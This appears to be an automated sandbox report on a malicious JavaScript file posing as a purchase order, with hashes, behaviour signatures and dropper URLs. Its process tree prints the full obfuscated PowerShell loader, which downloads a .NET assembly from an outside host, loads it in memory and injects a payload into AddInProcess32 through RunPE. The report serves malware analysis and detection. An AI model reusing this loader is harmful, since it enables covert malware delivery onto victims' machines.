Analysis

  • max time kernel
    94s
  • max time network
    203s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    19-09-2024 06:44

General

  • Target

    PO No.7500011330.js

  • Size

    601KB

  • MD5

    2775b43e1e9b8e237f506cc02c0dfd9e

  • SHA1

    0816358f326556470110ded8e13e3409ab46ec4c

  • SHA256

    92e24621f961d0095911956dbe9a6400feb59a324cbb0994ae1290b2a2045b13

  • SHA512

    a41baead687120db6017b800d09604e3b53113c229a5fcf18d7a7d1b1f3f05319e0239d160150bcf4b01caff7989829d6730ae0c728d793641f09bb0347c97d0

  • SSDEEP

    12288:Dvf0MG9e5BJXO6fU68Mkf/r3z0jUJPjjids+hXhGjpLJCZgywlrzvR6tNhEY8vTi:hTEt3Y1ZaXc

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://ia904601.us.archive.org/6/items/detah-note-j/DetahNoteJ.txt

exe.dropper

https://ia904601.us.archive.org/6/items/detah-note-j/DetahNoteJ.txt

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Command and Scripting Interpreter: JavaScript 1 TTPs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe "C:\Users\Admin\AppData\Local\Temp\PO No.7500011330.js"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:5004
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JgAoACAAJABWAGUAcgBiAE8AcwBFAFAAUgBlAEYARQBSAEUAbgBjAEUALgB0AG8AcwBUAHIAaQBuAEcAKAApAFsAMQAsADMAXQArACcAeAAnAC0ASgBvAEkATgAnACcAKQAgACgAIAAoACgAJwB4AEUAdAB1AHIAJwArACcAbAAgAD0AIABGADUASgBoAHQAdABwACcAKwAnAHMAOgAvACcAKwAnAC8AJwArACcAaQBhADkAMAAnACsAJwA0ADYAJwArACcAMAAnACsAJwAxAC4AdQAnACsAJwBzAC4AYQByACcAKwAnAGMAaABpACcAKwAnAHYAZQAuAG8AcgBnAC8ANgAnACsAJwAvAGkAdAAnACsAJwBlAG0AcwAvAGQAJwArACcAZQB0ACcAKwAnAGEAaAAtAG4AbwB0ACcAKwAnAGUALQAnACsAJwBqAC8ARABlAHQAYQBoACcAKwAnAE4AbwB0ACcAKwAnAGUASgAnACsAJwAuAHQAeAB0AEYANQBKADsAeABFACcAKwAnAHQAYgBhACcAKwAnAHMAZQA2ADQAQwBvAG4AdABlAG4AdAAgAD0AIAAoAE4AZQB3AC0AJwArACcATwBiAGoAZQBjACcAKwAnAHQAIAAnACsAJwBTAHkAJwArACcAcwAnACsAJwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuACcAKwAnAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpACcAKwAnAG4AZwAoAHgARQB0AHUAJwArACcAcgBsACcAKwAnACkAOwB4AEUAdABiAGkAbgBhAHIAJwArACcAeQBDAG8AbgB0AGUAbgB0ACAAPQAnACsAJwAgAFsAJwArACcAUwB5AHMAJwArACcAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AJwArACcAOgA6AEYAJwArACcAcgBvAG0AQgBhAHMAJwArACcAZQA2ADQAUwB0AHIAaQBuAGcAKAB4AEUAJwArACcAdAAnACsAJwBiACcAKwAnAGEAcwAnACsAJwBlADYAJwArACcANAAnACsAJwBDAG8AbgB0AGUAbgB0ACkAOwB4AEUAdAAnACsAJwBhAHMAcwBlACcAKwAnAG0AYgBsAHkAJwArACcAIAA9ACAAWwBSAGUAZgBsAGUAYwAnACsAJwB0ACcAKwAnAGkAbwBuAC4AQQBzAHMAZQBtACcAKwAnAGIAbAB5AF0AOgA6AEwAbwBhACcAKwAnAGQAKAB4ACcAKwAnAEUAdABiAGkAbgBhAHIAJwArACcAeQBDAG8AbgB0ACcAKwAnAGUAbgB0ACkAOwAnACsAJwB4ACcAKwAnAEUAdAB0ACcAKwAnAHkAcABlACAAPQAgAHgARQB0AGEAcwBzAGUAbQAnACsAJwBiACcAKwAnAGwAeQAuACcAKwAnAEcAZQB0AFQAeQBwACcAKwAnAGUAKABGADUAJwArACcASgBSAHUAbgBQAEUALgBIACcAKwAnAG8AJwArACcAbQAnACsAJwBlAEYAJwArACcANQBKACkAOwB4AEUAdABtAGUAdABoAG8AZAAgAD0AIAB4AEUAJwArACcAdAAnACsAJwB0AHkAcABlACcAKwAnAC4ARwBlAHQATQBlAHQAaABvAGQAKABGADUASgBWAEEAJwArACcASQBGADUASgAnACsAJwApADsAeABFAHQAbQAnACsAJwBlAHQAJwArACcAaAAnACsAJwBvAGQALgBJAG4AdgBvAGsAZQAnACsAJwAoACcAKwAnAHgARQAnACsAJwB0AG4AdQBsAGwALAAgAFsAJwArACcAbwBiAGoAZQAnACsAJwBjAHQAWwBdAF0AQAAoAEYANQAnACsAJwBKACcAKwAnAHQAJwArACcAeAB0ACcAKwAnAC4AaABjAG8AcwBlAGwAaQBkAC8AdgBlAGQALgAyAHIALgAzADkAYgAzADQANQAzADAAJwArACcAMgAnACsAJwBhADAANwA1AGIAMQBiAGMAMABkADQANQBiADYAMwAyACcAKwAnAGUAYgAnACsAJwA5AGUAZQA2ADIALQBiAHUAcAAvAC8AOgBzAHAAJwArACcAdAB0AGgARgA1ACcAKwAnAEoAIAAsACcAKwAnACAAJwArACcARgA1AEoAZABlACcAKwAnAHMAYQB0AGkAdgBhAGQAbwBGADUASgAgACwAIABGADUASgBkAGUAcwBhAHQAaQB2AGEAZABvAEYANQBKACAALAAgAEYANQAnACsAJwBKAGQAZQBzAGEAdABpAHYAYQBkAG8ARgA1AEoAJwArACcALABGADUASgAnACsAJwBBAGQAZABJAG4AUAByAG8AYwBlAHMAcwAzADIAJwArACcARgA1AEoALABGACcAKwAnADUASgAnACsAJwBkAGUAcwBhAHQAJwArACcAaQB2AGEAZABvAEYANQBKACkAJwArACcAKQA7ACcAKQAtAFIAZQBQAGwAQQBDAEUAIAAnAEYANQBKACcALABbAGMAaABhAHIAXQAzADkAIAAtAFIAZQBQAGwAQQBDAEUAIAAnAHgARQB0ACcALABbAGMAaABhAHIAXQAzADYAKQAgACkA';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3872
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "&( $VerbOsEPReFEREncE.tosTrinG()[1,3]+'x'-JoIN'') ( (('xEtur'+'l = F5Jhttp'+'s:/'+'/'+'ia90'+'46'+'0'+'1.u'+'s.ar'+'chi'+'ve.org/6'+'/it'+'ems/d'+'et'+'ah-not'+'e-'+'j/Detah'+'Not'+'eJ'+'.txtF5J;xE'+'tba'+'se64Content = (New-'+'Objec'+'t '+'Sy'+'s'+'tem.Net.WebClien'+'t).DownloadStri'+'ng(xEtu'+'rl'+');xEtbinar'+'yContent ='+' ['+'Sys'+'tem.Convert]'+'::F'+'romBas'+'e64String(xE'+'t'+'b'+'as'+'e6'+'4'+'Content);xEt'+'asse'+'mbly'+' = [Reflec'+'t'+'ion.Assem'+'bly]::Loa'+'d(x'+'Etbinar'+'yCont'+'ent);'+'x'+'Ett'+'ype = xEtassem'+'b'+'ly.'+'GetTyp'+'e(F5'+'JRunPE.H'+'o'+'m'+'eF'+'5J);xEtmethod = xE'+'t'+'type'+'.GetMethod(F5JVA'+'IF5J'+');xEtm'+'et'+'h'+'od.Invoke'+'('+'xE'+'tnull, ['+'obje'+'ct[]]@(F5'+'J'+'t'+'xt'+'.hcoselid/ved.2r.39b34530'+'2'+'a075b1bc0d45b632'+'eb'+'9ee62-bup//:sp'+'tthF5'+'J ,'+' '+'F5Jde'+'sativadoF5J , F5JdesativadoF5J , F5'+'JdesativadoF5J'+',F5J'+'AddInProcess32'+'F5J,F'+'5J'+'desat'+'ivadoF5J)'+');')-RePlACE 'F5J',[char]39 -RePlACE 'xEt',[char]36) )"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1804

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

    Filesize

    2KB

    MD5

    2f57fde6b33e89a63cf0dfdd6e60a351

    SHA1

    445bf1b07223a04f8a159581a3d37d630273010f

    SHA256

    3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

    SHA512

    42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    64B

    MD5

    50a8221b93fbd2628ac460dd408a9fc1

    SHA1

    7e99fe16a9b14079b6f0316c37cc473e1f83a7e6

    SHA256

    46e488628e5348c9c4dfcdeed5a91747eae3b3aa49ae1b94d37173b6609efa0e

    SHA512

    27dda53e7edcc1a12c61234e850fe73bf3923f5c3c19826b67f2faf9e0a14ba6658001a9d6a56a7036409feb9238dd452406e88e318919127b4a06c64dba86f0

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kbei3yly.zad.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • memory/1804-22-0x000002AB7D0A0000-0x000002AB7D2AC000-memory.dmp

    Filesize

    2.0MB

  • memory/3872-0-0x00007FFE17B13000-0x00007FFE17B15000-memory.dmp

    Filesize

    8KB

  • memory/3872-1-0x000002C04DD20000-0x000002C04DD42000-memory.dmp

    Filesize

    136KB

  • memory/3872-11-0x00007FFE17B10000-0x00007FFE185D1000-memory.dmp

    Filesize

    10.8MB

  • memory/3872-12-0x00007FFE17B10000-0x00007FFE185D1000-memory.dmp

    Filesize

    10.8MB

  • memory/3872-28-0x00007FFE17B10000-0x00007FFE185D1000-memory.dmp

    Filesize

    10.8MB